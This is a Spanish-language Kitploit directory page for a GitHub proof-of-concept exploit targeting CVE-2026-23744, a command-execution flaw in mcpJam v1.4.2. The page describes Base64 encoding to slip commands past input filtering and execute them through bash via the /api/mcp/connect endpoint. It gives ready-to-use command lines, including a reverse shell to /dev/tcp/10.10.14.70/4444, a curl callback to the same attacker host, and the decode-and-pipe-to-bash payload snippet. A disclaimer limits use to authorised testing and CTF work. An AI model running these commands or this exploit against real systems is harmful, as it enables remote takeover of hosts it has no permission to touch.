Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23744-poc — cve-2026-23744 exploit en Python | Kitploit
Herramientas/GitHubGitHub/keeieb79/cve-2026-23744-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubkeeieb79/cve-2026-23744-poc

CVE-2026-23744-poc

cve-2026-23744 exploit en Python

Ver Repositorio
2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23744 — Exploit de Ejecución Remota de Código (RCE) para mcpJam

Un exploit de prueba de concepto en Python 3 para CVE-2026-23744, una vulnerabilidad de ejecución arbitraria de comandos que afecta a mcpJam v1.4.2.

Esta utilidad automatiza la entrega de payloads codificando de forma transparente los comandos en Base64 antes de la transmisión, ayudando a eludir la validación restrictiva de entrada y los mecanismos de filtrado de caracteres. El payload se descodifica y ejecuta a través de un envoltorio /bin/bash en el sistema objetivo.


Características

Codificación Automática de Payload en Base64

Los comandos se codifican automáticamente antes de la transmisión, mejorando la fiabilidad al apuntar a aplicaciones que imponen una validación estricta de entrada o restricciones de caracteres.

Ejecución Flexible de Comandos

Admite la ejecución arbitraria de comandos, incluyendo:

  • Shells reversas (sh, bash, nc, etc.)
Descargar herramienta
  • Enumeración del sistema
  • Pruebas de conectividad de red
  • Entrega de payloads personalizados
  • Salida de Depuración Detallada

    Muestra:

    • Payloads de solicitud JSON generados
    • Respuestas sin procesar del servidor

    Esto simplifica la resolución de problemas y la validación del exploit.

    Omisión de Verificación SSL

    Suprime las advertencias de verificación de certificados, permitiendo la interacción con objetivos que utilizan certificados SSL autofirmados o no confiables.


    Uso

    Requisitos Previos

    Instale la dependencia requerida:

    root@kitploit:~
    pip install requests
    

    Sintaxis

    root@kitploit:~
    python3 exploit.py <target_url> "<command>"
    

    Ejemplos

    Prueba de Conectividad

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
    

    Shell Reversa

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
    

    Detalles Técnicos

    El exploit apunta al endpoint /api/mcp/connect creando un objeto serverConfig malicioso.

    En lugar de transmitir comandos directamente, el payload se transforma en una cadena codificada en Base64 y se ejecuta a través de Bash:

    root@kitploit:~
    "args": [
        "-c",
        f"echo {base64_payload} | base64 -d | bash"
    ]
    

    Este enfoque ayuda a evadir el filtrado a nivel de aplicación mientras asegura que el payload se descodifique y ejecute completamente en el host objetivo.

    Flujo de Ejecución

    1. El comando proporcionado por el usuario se codifica en Base64.
    2. El payload codificado se incrusta en la solicitud serverConfig.
    3. El servidor objetivo descodifica el payload utilizando base64 -d.
    4. El comando descodificado se canaliza directamente a /bin/bash.
    5. El comando se ejecuta con los privilegios del proceso vulnerable de mcpJam.

    Descargo de Responsabilidad

    [!WARNING] Este proyecto se proporciona únicamente con fines educativos, evaluaciones de seguridad autorizadas y entornos Capture The Flag (CTF).

    El uso no autorizado contra sistemas para los cuales no tiene permiso explícito es ilegal y poco ético. El autor no asume ninguna responsabilidad por cualquier mal uso, daños o consecuencias legales derivadas del uso de este software.